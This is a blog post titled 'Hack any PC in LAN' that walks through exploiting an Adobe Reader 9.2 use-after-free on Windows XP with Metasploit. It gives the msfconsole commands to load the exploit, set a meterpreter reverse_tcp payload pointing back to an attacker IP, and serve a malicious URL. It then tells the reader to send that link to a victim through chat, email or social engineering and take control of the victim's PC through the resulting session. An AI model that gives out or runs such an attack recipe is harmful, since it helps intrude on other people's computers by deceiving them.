Warung Online
Headlines News :
mas template
Home » , » Hack any PC in LAN using Adobe Doc.media.newPlayer Use After Free Vulnerability

Hack any PC in LAN using Adobe Doc.media.newPlayer Use After Free Vulnerability

Written By Trik Cari Duit on Minggu, 27 Mei 2012 | 16.08

This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.

Exploit Targets
Adobe Reader 9.2
Windows XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole



Now type use exploit/windows/browser/adobe_media_newplayer

Msf exploit (adobe_media_newplayer)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_media_newplayer)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (adobe_media_newplayer)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (adobe_media_newplayer)>set uripath adobemediaplayer(The Url to use for this exploit)
Msf exploit (adobe_media_newplayer)>exploit


Now an URL you should give to your victim http://192.168.1.2:8080/adobemediaplayer


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger